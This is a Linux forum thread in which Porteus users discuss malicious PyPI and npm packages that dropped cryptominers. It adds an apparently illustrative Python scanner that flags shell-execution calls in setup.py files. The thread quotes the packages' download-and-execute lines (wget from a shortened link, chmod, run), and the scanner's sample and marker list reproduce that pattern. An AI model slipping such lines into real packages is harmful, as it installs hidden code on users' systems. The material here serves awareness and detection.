Is PyPI something to look out for in Porteus?
- Karmi
- Samurai
- Posts: 162
- Joined: 03 Apr 2022, 19:46
- Distribution: Linux
- Location: Old Town, Florida USA
Just reading the '241 npm and PyPI packages caught dropping Linux cryptominers' article and wondered...
- ncmprhnsbl
- DEV Team
- Posts: 3933
- Joined: 20 Mar 2012, 03:42
- Distribution: v5.0-64bit
- Location: australia
the fact that they (bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:
Code:
    os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
    os.system("chmod +x .cmc >/dev/null 2>&1")
    os.system("./.cmc >/dev/null 2>&1")
would (should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is a systemd command that porteus doesn't have..
more generally, any package from any source on the web should be treated with caution..
Forum Rules : https://forum.porteus.org/viewtopic.php?f=35&t=44
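
One way to look for the pattern in the snippet above before installing a downloaded package, as an added example that is not part of the thread or the article. It parses a setup.py with Python's ast module (nothing is executed) and lists calls that run shell commands; the marker list and the sample file are constructed here, and the sample uses a placeholder URL.

```python
import ast

# Calls that hand a command to a shell or spawn a process.
EXEC_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
              "subprocess.Popen", "subprocess.check_call",
              "subprocess.check_output"}
# Constructed marker list: substrings worth a second look in the command text.
MARKERS = ("sudo ", "wget ", "curl ", "chmod +x", "/dev/null", "systemctl")


def dotted_name(node):
    """Return 'os.system' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_source(source):
    """Return sorted (line, call, markers) for each shell-execution call."""
    findings = []
    for node in ast.walk(ast.parse(source)):  # parse only, never run
        if isinstance(node, ast.Call) and dotted_name(node.func) in EXEC_CALLS:
            # Gather every string literal inside the call's arguments.
            text = " ".join(
                c.value for arg in node.args for c in ast.walk(arg)
                if isinstance(c, ast.Constant) and isinstance(c.value, str))
            hits = [m.strip() for m in MARKERS if m in text]
            findings.append((node.lineno, dotted_name(node.func), hits))
    return sorted(findings)


# Constructed sample shaped like the quoted snippet; placeholder URL.
SAMPLE_SETUP = '''\
import os
from setuptools import setup
os.system("sudo wget https://example.invalid/x -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
setup(name="demo", version="0.0.1")
'''

if __name__ == "__main__":
    for line, call, hits in scan_source(SAMPLE_SETUP):
        print(f"line {line}: {call} markers={hits}")
```

This only matches calls written with their full module name, so code that imports the function under another name (for example `from os import system`) is not reported; an empty result is not proof that a package is clean.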
- Karmi
- Samurai
- Posts: 162
- Joined: 03 Apr 2022, 19:46
- Distribution: Linux
- Location: Old Town, Florida USA
OK...thanks!

ncmprhnsbl wrote: ↑20 Aug 2022, 02:29
the fact that they (bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:
Code:
    os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
    os.system("chmod +x .cmc >/dev/null 2>&1")
    os.system("./.cmc >/dev/null 2>&1")
would (should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is a systemd command that porteus doesn't have..
more generally, any package from any source on the web should be treated with caution..